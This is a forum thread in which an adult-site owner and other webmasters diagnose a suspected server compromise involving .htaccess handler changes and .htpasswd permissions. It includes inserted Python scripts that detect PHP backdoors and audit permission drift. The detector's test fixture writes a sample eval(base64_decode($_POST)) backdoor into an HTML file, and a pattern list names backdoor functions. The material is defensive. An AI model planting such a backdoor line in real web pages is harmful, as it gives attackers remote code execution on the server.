GoFuckYourself.com - Adult Webmaster Forum

Thread: Looking for explanation to security breach (https://gfy.com/showthread.php?t=963818)

mmcfadden 04-16-2010 08:17 AM

Looking for explanation to security breach
 
I am trying to figure out what happened to one of my sites.

Bottom line sales were not good for a solid 3 week stretch and then 2 days of nothing. I finally had a test transaction done last night and permission settings for .htpasswd were changed.

I know there are a lot of knowledgeable people on gfy that may know how a scam like this would work. How can I track down what processor would use the changed permission setting, and how could I still receive some sales during this stretch? Like it was changed for a period of time then changed back. My host claims they cannot track a change to the settings... only if the file was uploaded. The biggest indicator is a 30 member discrepancy in my password file.

For this to work my page prior to processor change would have had to have been replaced as well. Can this be done without me knowing... ie my IP would be recognized and show the correct cc page?

Finally, is there any way for permission settings on password files to be inadvertently changed by some hosting anomaly?

BestXXXPorn 04-16-2010 08:28 AM

Are you on a dedicated box or a shared box?

What OS?

Is FTP enabled?

Is SSH restricted by IP or open?

Do you use auth keys? Could anyone have taken your private key?

There's a million ways it "could" happen so it's hard to have any idea without more information... The devil is in the details...

VGeorgie 04-16-2010 09:00 AM

Could happen if the host has to do a restore and the settings aren't right (has happened to me with a particular host known around here, so I imagine it could happen elsewhere). They should tell you if they did, but the tech may not be looking at the right place to see it, and let you know.

But, how would a change to your htpasswd file affect sales? If anything, you'd be getting the sales, but members wouldn't be added. If you're using CCBill for the biller, you should get an e-mail if their JPOST script fails on an add because of a bad or missing htpasswd file.

plsureking 04-16-2010 09:08 AM

Ya, if it is actually a hack, they could have figured out the path to your htpass file and then injected a script to edit it. Or they could be hacking the biller script if it is discoverable.

I doubt it was a hack though. Most likely just a screwed up script somewhere.

You should be using separate pass files for each biller too, all with unique, unguessable names.

mmcfadden 04-16-2010 09:50 AM

Quote:

Originally Posted by VGeorgie (Post 17038141)
Could happen if the host has to do a restore and the settings aren't right (has happened to me with a particular host known around here, so I imagine it could happen elsewhere). They should tell you if they did, but the tech may not be looking at the right place to see it, and let you know.

But, how would a change to your htpasswd file affect sales? If anything, you'd be getting the sales, but members wouldn't be added. If you're using CCBill for the biller, you should get an e-mail if their JPOST script fails on an add because of a bad or missing htpasswd file.

What host?

Sales will not go through as ccbill explained to me. They tried last night and it didn't even register as a submission...

Sales have been minimal for a couple weeks now so either my settings were changed 2 days ago (2 days of solid zero sales) or like you say... sales can still squeeze through once in a while.

I don't know... people that work on the site have (actually had) FTP access.

VGeorgie 04-16-2010 10:31 AM

I left the host several years ago and there's no reason to go muckraking. Needless to say, they have a spotty record here, so if you use them, you'll know by their rep if you should be staying around.

When this happened to me the sale went through, but I caught it early enough to manually fix the problem and I got credited. Don't know if they've changed things since then.

You can look at your CCBill error log (it's in a directory under your CCBill posting script, in your CGI directory) to see if there were problems with other transactions. And, go into your CCBill admin and make sure you are set to get e-mails for posting errors.

(I just checked, and the one place to put in an e-mail for these warnings says it only works with STORED user names. I do use those now, but didn't when I got the error message way back when. You may want to ask Client Support for help here.)

As for a hack changing the permissions to (apparently) make it unwritable, why would they do that? Generally they just try to snag it so they can hack it offline. They don't do anything to make you suspicious that there was a break in. More likely the file was inadvertently changed by someone with authorized access.

mmcfadden 04-16-2010 01:55 PM

My error log stopped working on 3-30-10. It had permission settings changed so nothing could be written to it.

Found this code in htaccess within /members. any ideas?? It's not ccbill's code

AddType application/x-httpd-php .html .htm

mmcfadden 04-16-2010 02:10 PM

Quote:

Originally Posted by VGeorgie (Post 17038466)
I left the host several years ago and there's no reason to go muckraking. Needless to say, they have a spotty record here, so if you use them, you'll know by their rep if you should be staying around.

How about you just ICQ me the name (and let me know it was you)? I just want to know what is happening but too many things wrong for just permission settings inadvertently changed

sortie 04-16-2010 02:43 PM

Quote:

Originally Posted by mmcfadden (Post 17038977)
My error log stopped working on 3-30-10. It had permission settings changed so nothing could be written to it.

Found this code in htaccess within /members. any ideas?? It's not ccbill's code

AddType application/x-httpd-php .html .htm

That code is making all your html pages execute as php. (I believe.)

So, you either needed that and did it yourself for the most dumb reason or
you don't really have many php pages so the hacker has to put his php inside
your html pages for them to execute or the hacker just wanted to infect all files.

If you didn't "secure" the ccbill member script then you could
get a hacker doing sign ups.

sortie 04-16-2010 02:49 PM

Quote:

Originally Posted by sortie (Post 17039135)
That code is making all your html pages execute as php. (I believe.)

So, you either needed that and did it yourself for the most dumb reason or
you don't really have many php pages so the hacker has to put his php inside
your html pages for them to execute or the hacker just wanted to infect all files.

If you didn't "secure" the ccbill member script then you could
get a hacker doing sign ups.

I take back the part about doing that for "the most dumb reason"; there are
good reasons to actually do that. Just not the way I do things.

TheDoc 04-16-2010 02:52 PM

It sounds like your hard drive / temp areas are full. When my log files quit working, .htpasswd files stop logging, anything like that - it's always something is full.

mmcfadden 04-16-2010 02:52 PM

Quote:

Originally Posted by sortie (Post 17039135)
That code is making all your html pages execute as php. (I believe.)

So, you either needed that and did it yourself for the most dumb reason or
you don't really have many php pages so the hacker has to put his php inside
your html pages for them to execute or the hacker just wanted to infect all files.

If you didn't "secure" the ccbill member script then you could
get a hacker doing sign ups.

Ok so let's say he dumped code into my html files... thousands of files actually that he could have dumped code into.

Besides just fucking up my site how would he be scraping the sales?

TheDoc 04-16-2010 02:53 PM

Quote:

Originally Posted by mmcfadden (Post 17038977)
AddType application/x-httpd-php .html .htm


Quote:

Originally Posted by sortie (Post 17039135)
That code is making all your html pages execute as php. (I believe.)

Correct.... it's nothing bad, just makes html pages execute php within them rather than having to name everything .php - lots of scripts require this.

ProG 04-16-2010 02:55 PM

I hope you are storing the htpasswd file outside of the DocumentRoot? What reason would someone have to make the file unwritable? Does ccbill validate the usernames in the file?

Perhaps your server ran out of space? Do you have rotating logs?

ProG 04-16-2010 02:59 PM

Quote:

Originally Posted by mmcfadden (Post 17039163)
Ok so let's say he dumped code into my html files... thousands of files actually that he could have dumped code into.

Besides just fucking up my site how would he be scraping the sales?

Typically they put an iframe into every page that loads something with spyware, virus, etc. If a surfer hits your page and his anti-virus goes off, I doubt he is going to signup.

mmcfadden 04-16-2010 03:01 PM

Quote:

Originally Posted by TheDoc (Post 17039170)
Correct.... it's nothing bad, just makes html pages execute php within them rather than having to name everything .php - lots of scripts require this.

Ok... so would a java popup require this? But even so an htaccess ccbill code is required in /members. That's how the members log in. That code replaced the ccbill code and users were still able to log-in because I have not received any complaints over the past couple weeks.

It is not a server or space issue... have a dedicated server with tons of space available.

TheDoc 04-16-2010 03:11 PM

Quote:

Originally Posted by mmcfadden (Post 17039186)
Ok... so would a java popup require this? But even so an htaccess ccbill code is required in /members. That's how the members log in. That code replaced the ccbill code and users were still able to log-in because I have not received any complaints over the past couple weeks.

It is not a server or space issue... have a dedicated server with tons of space available.

js wouldn't require that, only php would..

When your temp areas fill up, your hd space can look fine... Every server has some /dev/, /logs or /etc/temp or some crap folders that sometimes screws up and doesn't empty - and aren't on the main drive space. It can mess with your .htpasswd files, locking and unlocking them longer than it should - screwing with permissions, missing record inserts, yet still seem like it works to you and most users.

sortie 04-16-2010 03:15 PM

Quote:

Originally Posted by mmcfadden (Post 17039163)
Ok so let's say he dumped code into my html files... thousands of files actually that he could have dumped code into.

Besides just fucking up my site how would he be scraping the sales?

If he planted a php script onto your site then members logging in will go thru his
php hack. Every member has to enter the "members directory" and that's when
the code in your htaccess will parse the html page as php and execute his hack
and let surfers in for free or what ever the hack script wants; like chmod errorlog.txt
to "444".

mmcfadden 04-16-2010 03:18 PM

Quote:

Originally Posted by TheDoc (Post 17039218)
js wouldn't require that, only php would..

When your temp areas fill up, your hd space can look fine... Every server has some /dev/ or /etc/temp or some crap folder that sometimes screws up and doesn't empty. It can mess with your .htpasswd files, locking and unlocking them longer than it should - screwing with permissions, missing record inserts, yet still seem like it works to you and most users.

I just got a new server last month with way more capacity than required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepancy in my password file with the changed permission settings.

EDepth 04-16-2010 03:25 PM

Quote:

Originally Posted by mmcfadden (Post 17039241)
I just got a new server last month with way more capacity than required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepancy in my password file with the changed permission settings.

That addtype line was added to hide exploits within html. Could be to install viruses, add passwords remotely, or whatever. But guaranteed you have exploits on your server hidden.
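
Sortie's and EDepth's point above (a handler override lets a dropped PHP backdoor hide inside ordinary .html pages, which is also where the chmod of the error log could be coming from) is something the site owner can check for himself. The following is an added example, not code from the thread or from CCBill: it walks a web root, reports .htaccess directives that route .html/.htm through PHP, and reports .html files that contain PHP open tags together with the functions a backdoor typically calls. The sample directory tree, its file contents and the list of "suspicious" functions are constructed for illustration.

```python
"""Added example (not code from the thread or from CCBill): find .htaccess
handler overrides that make .html/.htm run as PHP, and PHP hidden in
.html files.  The sample tree and the function list are constructed."""
import os
import re
import tempfile

# Directives that change how a file is served.  In a directory you did not
# configure, any of these pointing at PHP deserves a look.
HANDLER_RE = re.compile(
    r'^[ \t]*(?:AddType|AddHandler|SetHandler|'
    r'php_value[ \t]+auto_(?:prepend|append)_file)\b.*$',
    re.IGNORECASE | re.MULTILINE)
MENTIONS_PHP_RE = re.compile(r'php', re.IGNORECASE)

# A PHP open tag (long form or echo form; '<?xml' deliberately not matched)
# and the functions a dropped backdoor usually leans on.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)', re.IGNORECASE)
SUSPICIOUS_RE = re.compile(
    r'\b(eval|assert|base64_decode|gzinflate|str_rot13|system|passthru|'
    r'shell_exec|exec|chmod|chown|fwrite|file_put_contents)[ \t]*\(',
    re.IGNORECASE)


def scan_htaccess(text):
    """Return the handler directives in an .htaccess body that route to PHP."""
    return [m.group(0).strip() for m in HANDLER_RE.finditer(text)
            if MENTIONS_PHP_RE.search(m.group(0))]


def scan_html(text):
    """Return (number of PHP open tags, sorted suspicious calls) for a page."""
    tags = len(PHP_TAG_RE.findall(text))
    if not tags:
        return 0, []
    return tags, sorted({m.group(1).lower() for m in SUSPICIOUS_RE.finditer(text)})


def scan_webroot(root):
    """Walk root and return (path, finding) pairs for both indicators."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name == '.htaccess':
                with open(path, encoding='utf-8', errors='replace') as fh:
                    for line in scan_htaccess(fh.read()):
                        findings.append((path, 'PHP handler override: ' + line))
            elif name.lower().endswith(('.html', '.htm')):
                with open(path, encoding='utf-8', errors='replace') as fh:
                    tags, calls = scan_html(fh.read())
                if tags:
                    findings.append((path, 'PHP in HTML: %d open tag(s); calls: %s'
                                     % (tags, ', '.join(calls) or 'none')))
    return findings


def build_sample_site():
    """Constructed tree modelled on the thread's /members directory."""
    root = tempfile.mkdtemp(prefix='webroot_')
    members = os.path.join(root, 'members')
    os.makedirs(members)
    with open(os.path.join(members, '.htaccess'), 'w') as fh:
        fh.write('AuthType Basic\n'
                 'AuthUserFile /home/site/cgi-bin/.htpasswd\n'   # assumed path
                 'Require valid-user\n'
                 'AddType application/x-httpd-php .html .htm\n')  # the line from the thread
    with open(os.path.join(members, 'index.html'), 'w') as fh:
        fh.write('<html><body>Welcome back.\n'
                 '<?php @chmod("../cgi-bin/errorlog.txt", 0444); '
                 'eval(base64_decode($_POST["c"])); ?>\n</body></html>\n')
    with open(os.path.join(root, 'index.html'), 'w') as fh:
        fh.write('<html><body>Join now.</body></html>\n')
    return root


if __name__ == '__main__':
    for path, finding in scan_webroot(build_sample_site()):
        print(path, '->', finding)
```

Run it against a copy of the site taken before anyone "cleans up", since the thread notes the .htaccess line had already been removed by the time the question was asked; a clean-looking .htaccess says nothing about what the .html files still contain.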

TheDoc 04-16-2010 03:25 PM

Quote:

Originally Posted by mmcfadden (Post 17039241)
I just got a new server last month with way more capacity than required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepancy in my password file with the changed permission settings.

Some people are straight up douche bags.... they aren't in it for the money, they get off knowing they fucked shit up.


Knowing you moved to a new server, it could be a hack - but it's not like new servers don't screw up at times either. May want to start over to make sure you clear out any issues, hacks, bad setups, etc.

sortie 04-16-2010 03:26 PM

Quote:

Originally Posted by mmcfadden (Post 17039241)
I just got a new server last month with way more capacity than required. How could individual files within my cgi-bin folder just randomly change permission settings... that's huge. Like I said the htaccess within /members was also changed... last update was 4-9-10. Everything points to a hack... or should I say direct intent to fuck my site up, but I do not understand how this person is making any money off it. One thing for sure is sales are outlandishly slow, but when I contacted CCbill yesterday they said there is no way for a sale to even go through with permission settings not matching theirs.

It's like files for the past 3 weeks have been uploaded, deleted, re-uploaded to take the sales but cannot understand how they could get a processor to take the sales.

There was a 30 member discrepancy in my password file with the changed permission settings.

The hack doesn't stop you from making normal sales.

Why do this? Password trading!!!!

The hack will load passwords into your file but it will not show up as a sale
from ccbill. Sales from ccbill will still go thru; but if your site is all over the
password trading sites then the surfers are using that instead of signing up.
Therefore signups are down.

I'm not claiming 100% this is happening; just saying from knowledge of working
with the system and my programming background that this is a very strong possibility.

sortie 04-16-2010 03:30 PM

Did the .htpasswd file have a change of permissions also?

mmcfadden 04-16-2010 03:36 PM

Quote:

Originally Posted by sortie (Post 17039270)
Did the .htpasswd file have a change of permissions also?

yes... it was changed to 775.. should have been 666

sortie 04-16-2010 03:47 PM

Quote:

Originally Posted by mmcfadden (Post 17039283)
yes... it was changed to 775.. should have been 666

Ok, then that explains how your sales are still going thru.

755 on some servers will allow the ccbill script to record sign ups.

mmcfadden 04-16-2010 03:50 PM

Quote:

Originally Posted by sortie (Post 17039302)
Ok, then that explains how your sales are still going thru.

755 on some servers will allow the ccbill script to record sign ups.

It was 775 though... not 755 (this was actually told to me and not verified)... another story which I was really clear I did not want anything changed until I had an archived copy of everything

sortie 04-16-2010 04:02 PM

Quote:

Originally Posted by mmcfadden (Post 17039307)
It was 775 though... not 755 (this was actually told to me and not verified)... another story which I was really clear I did not want anything changed until I had an archived copy of everything

Email me the name of your host please : tube at econfirmpro dot com.

VGeorgie 04-16-2010 04:05 PM

666 is less secure than 755 (or 775 for that matter), and there's no real reason for a hacker to have modified your files so. It still looks like a crummy tar and restore job. Or just some sloppy admining. You said people had FTP access. Maybe one of them did it, especially if you didn't change the password when they were done moving your site.

I don't bother with ICQ. If you trust your host, then you trust them. If not...

To be fair, when this happened to me I was on a virtual plan. I switched to a dedicated plan for a few months, and fewer really bad mistakes happened.

VGeorgie 04-16-2010 04:12 PM

I'll add that sales to my site have been really slow the bulk of this week, and particularly bad today, even though it's a Friday, near the 15th, and a payday for many people. My site hasn't been hacked, my file permissions are correct, and I haven't moved my site.

I have nothing to blame my poor sales on other than tubes, too much free porn, the week after Easter and Passover, volcanic ash in Europe, the Democrats, the Republicans, the Tea Party, Sarah Palin, Michael Palin,...

(I'm not really making light of your situation, and it's a PITA to have to double check a host's work. I'm just saying there could be other reasons for the bad sales days.)

sortie 04-16-2010 04:15 PM

Quote:

Originally Posted by VGeorgie (Post 17039345)
666 is less secure than 755 (or 775 for that matter)


That is old/bad information and actually is an indicator that your host is complete fucking
shit. If you fear setting a file to 777 then you're already fucked.

If you are on a secure server with no holes in your scripts then there is no way
I can hack your site just because you set every file to 777.

I wish people would quit repeating this bullshit.

If your host says "you were hacked because you had files set to 777" then you are
crazy to keep hosting there.

VGeorgie 04-16-2010 04:29 PM

Well I wouldn't want to tempt fate. At least 7?5 is not writable by the web server.

Besides, I still don't think he was hacked, and only a dim hacker would change file permission from 666 to 7?5, because he'd get more mileage keeping it at 666. That's the point I was trying to make.

mmcfadden 04-16-2010 05:04 PM

Quote:

Originally Posted by sortie (Post 17039336)
Email me the name of your host please : tube at econfirmpro dot com.

sent it... i don't think it was the host... the programmer I gave ftp access to is my suspicion. But I want to know how he made money from it... then i'll pursue that

sortie 04-16-2010 05:08 PM

Quote:

Originally Posted by VGeorgie (Post 17039415)
Well I wouldn't want to tempt fate. At least 7?5 is not writable by the web server.

Besides, I still don't think he was hacked, and only a dim hacker would change file permission from 666 to 7?5, because he'd get more mileage keeping it at 666. That's the point I was trying to make.


No, wrong again!!!!!!!!!!!!!!!


That's why you should stop repeating this bullshit.

If I get on your server thru a script then I can chmod any file to whatever I want
so what difference does it make what you set it to???

I already said that 755 will let the ccbill script work the same and clearly the
permissions were changed. He already said that.

So telling him to set permission to 666 means bullshit since the hacker changed it to 755
anyway.


This debate is so old and so stupid to any decent programmer but
no way can we ever stop this information from spreading.

If your host told you to change your 777 files to 755/744/766/etc because of security
issues then your host is shit!! OK!!!!


Look at it this way : I am telling you that there are no 777's of Mass Destruction!

Stop looking for them!


Look for a decent hosting company instead.

VGeorgie 04-16-2010 06:09 PM

I never told him to change it to 666. That's the standard setting CCBill does when they install their scripts. That's what the permissions WERE. Whether or not other permissions work is not the point. No hacker is going to bother changing them to 775 or 755 because as you say it wouldn't matter if they've already hacked the site. Just keep it at 666 and no one would have known the difference.

I don't think it's too much to ask to not read things into something I didn't write.

My other point is that there is no need to have more permissive settings than what's needed to get the job done. That's just common sense, for everything, not just servers.

mmcfadden 04-16-2010 06:14 PM

Quote:

Originally Posted by VGeorgie (Post 17039627)
I never told him to change it to 666. That's the standard setting CCBill does when they install their scripts. That's what the permissions WERE. Whether or not other permissions work is not the point. No hacker is going to bother changing them to 775 or 755 because as you say it wouldn't matter if they've already hacked the site. Just keep it at 666 and no one would have known the difference.

I don't think it's too much to ask to not read things into something I didn't write.

My other point is that there is no need to have more permissive settings than what's needed to get the job done. That's just common sense, for everything, not just servers.

it's not a hacker... it would be the programmer I gave full FTP access to.

My question remains are there any processors out there that would write to htpasswd file set at 775 and collect the money?

I have no idea but not a sale today either... never, never has happened since I opened the site.

Maybe check it out and see if anything comes up? I have accessed so many times and I see nothing out of the ordinary by going to the site.

www.vstrippoker.com

mmcfadden 04-16-2010 06:24 PM

Quote:

Originally Posted by EDepth (Post 17039259)
That addtype line was added to hide exploits within html. Could be to install viruses, add passwords remotely, or whatever. But guaranteed you have exploits on your server hidden.

So what would I look for written into html... that code in htaccess is obviously gone but now what do I need to try and find?

VGeorgie 04-16-2010 06:37 PM

This is all I'm going to say on the matter because there are people who seem to itch at misreading what others write.

You can do your own transaction tests through CCBill. Assuming you haven't done this before:

Go to your admin panel, find the Test Transactions tab, and enter your e-mail and IP information. Note the dummy MC and Visa card numbers to use for the test.

Go to your site, fill out your subscription form, and provide the dummy card number. Be sure you give the right e-mail address, and you are connected from the IP you said you would.

If the transaction is successful you'll be shown your usual welcome page. If not, you'll see that, too. If successful, check your htpasswd file for the just-added username and password. (It will be deleted automatically in a day, so just leave it if it's there.)

Use this method any time to see if the CCBill setup is working. No guess work needed.

EDepth 04-16-2010 06:40 PM

Quote:

Originally Posted by mmcfadden (Post 17039652)
So what would I look for written into html... that code in htaccess is obviously gone but now what do I need to try and find?

Your host most likely has a script they can run on your server to find exploits.

VGeorgie 04-16-2010 06:41 PM

Okay, next to the last thing. Here's the last:

You can also test the user management function of CCBill just by doing a Manual Add. That's in the (as I recall) Members tab. Select the specific account, then click Manual Add. Provide a username/password. You're told if the add was successful or not. Verify the username and password have been added to your site.

You should do a Manual Remove after the test.

You can perform these steps whenever you make a change to your site that you think might impact the user management aspects.

mmcfadden 04-16-2010 06:42 PM

I know that... that's how I found the problem last night doing a test transaction.

Now the files have been replaced that were fucked but I don't think the site is ok... I think there is still code jammed all over the place and likely need to replace the whole fucking thing from a month ago.

But... someone has screwed with my site, that is certain, all I want to know is if they made money from it. So that is why I keep asking if a processor that anybody may know of will post to htpasswd file with the code 775 in it??

Then I do what I need to do.

sortie 04-16-2010 07:56 PM

Quote:

Originally Posted by VGeorgie (Post 17039627)
I never told him to change it to 666. That's the standard setting CCBill does when they install their scripts. That's what the permissions WERE. Whether or not other permissions work is not the point. No hacker is going to bother changing them to 775 or 755 because as you say it wouldn't matter if they've already hacked the site. Just keep it at 666 and no one would have known the difference.

I don't think it's too much to ask to not read things into something I didn't write.

My other point is that there is no need to have more permissive settings than what's needed to get the job done. That's just common sense, for everything, not just servers.


You are assuming that you know exactly what the hacker is trying to do.

Scenario :

If the hacker chown/chgrp the file in addition to chmod 755 then this can make the
file unchangeable by the website owner when he logs into FTP. (at least some servers)
The webmaster is no longer the owner of the file and needs 666, but can't
change it to 666 himself because he is not the file owner anymore.
So now we have a file full of hacked passwords that we can't change thru FTP.

This can be fixed, but is just one more way to slow the fix down.

There are other things possible too.
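
The permission argument in the posts above (666 versus 755/775, and sortie's chown scenario) comes down to two checks the site owner can run himself instead of asking the host: has the mode or owner of the files the biller's script must write drifted from what was installed, and were permissions changed in place without a re-upload. The following is an added example, not code from the thread or from CCBill. It audits one file against an expected mode and owner, says who the current mode lets write, checks that the current account can still write it, and uses the fact that chmod and chown update a file's ctime but not its mtime, which is exactly the kind of change the host in the thread said it could not see (an upload bumps both). The sample files are constructed in a temp directory and the expected values are assumptions.

```python
"""Added example (not code from the thread or from CCBill): audit the
files a biller's posting script must write, flagging mode/owner drift
and in-place permission changes.  Paths and expected values are assumed."""
import os
import stat
import tempfile
import time


def who_can_write(mode):
    """Which classes of user a mode grants write access to."""
    classes = []
    if mode & stat.S_IWUSR:
        classes.append('owner')
    if mode & stat.S_IWGRP:
        classes.append('group')
    if mode & stat.S_IWOTH:
        classes.append('other')
    return classes


def audit(path, expected_mode, expected_uid=None, skew=1.0):
    """Return a list of issues for one file; an empty list means clean.

    expected_mode: the mode the biller's installer set (0o666 for the
    .htpasswd in the thread).  expected_uid: the account that should own it.
    skew: how far (seconds) ctime may lead mtime before it counts as an
    in-place metadata change.
    """
    st = os.stat(path)
    actual = stat.S_IMODE(st.st_mode)
    issues = []
    if actual != expected_mode:
        issues.append('mode is %s, expected %s (writable by: %s)'
                      % (oct(actual), oct(expected_mode),
                         ', '.join(who_can_write(actual)) or 'nobody'))
    if expected_uid is not None and st.st_uid != expected_uid:
        issues.append('owner uid is %d, expected %d' % (st.st_uid, expected_uid))
    if not os.access(path, os.W_OK):
        issues.append('not writable by uid %d (a posting script running as '
                      'this user would fail here)' % os.getuid())
    # chmod and chown update ctime and leave mtime alone; writing or
    # re-uploading the file bumps both.  ctime well ahead of mtime therefore
    # means the metadata was changed in place, with no upload to show for it.
    if st.st_ctime - st.st_mtime > skew:
        issues.append('permissions/owner changed at %s but content last written %s'
                      % (time.ctime(st.st_ctime), time.ctime(st.st_mtime)))
    return issues


def build_sample():
    """Constructed sample: two password files, one of them chmod'ed later."""
    d = tempfile.mkdtemp(prefix='cgi-bin_')
    untouched = os.path.join(d, '.htpasswd.untouched')
    chmodded = os.path.join(d, '.htpasswd')
    for p in (untouched, chmodded):
        with open(p, 'w') as fh:
            fh.write('member1:$apr1$s4lt$AbCdEfGhIjKlMnOpQrStUv\n')
        os.chmod(p, 0o666)          # what the biller's installer is said to set
    time.sleep(2)                   # let the clock move so ctime can lead mtime
    os.chmod(chmodded, 0o775)       # the change the thread describes (666 -> 775)
    return untouched, chmodded


if __name__ == '__main__':
    for p in build_sample():
        print(p, audit(p, 0o666, os.getuid()) or 'clean')
```

In practice, record the expected mode and owner of each writable file right after the biller installs its script and run the audit from a cron job; the ctime heuristic only works until the next legitimate write, so a snapshot of the baseline is what makes it useful weeks later. Note that the chown variant sortie describes would show up here as the owner-uid mismatch, and the resulting inability to chmod it back shows up as the writability failure.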

mmcfadden 04-16-2010 08:16 PM

It's great... the programmer I suspect but never accused personally has vanished as soon as I mentioned my password files were fucked with.

I don't know, maybe just me, but somebody who was paid to make sure the site was up to snuff just decides to log off ICQ and not answer after I mention I have a security problem (10 am this morning is when I said it) is gone? hmmm

so crazy... i just can't understand how he would have benefited from this.

sortie 04-16-2010 08:26 PM

Quote:

Originally Posted by mmcfadden (Post 17039796)
its great... the programmer I suspect but never accused personally has vanished as soon as I mentioned my password files were fucked with.

I don't know, maybe just me, but somebody who was paid to make sure the site was up to snuff just decides to log off ICQ and not answer after I mention I have a security problem (10 am this morning is when I said it) is gone? hmmm

so crazy... i just can't understand how he would have benefited from this.

If it's the programmer then this is the first time on GFY I saw that happen.

Maybe the only benefit is exploits to download on surfers.

mmcfadden 04-16-2010 08:34 PM

Quote:

Originally Posted by sortie (Post 17039809)
If it's the programmer then this is the first time on GFY I saw that happen.

Maybe the only benefit is exploits to download on surfers.

3 FTP passwords were given out and active over the past 3 weeks. Programmer, CCbill, my host.

I don't think my site was hacked...

LoveSandra 04-17-2010 03:51 AM

see my sig



Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.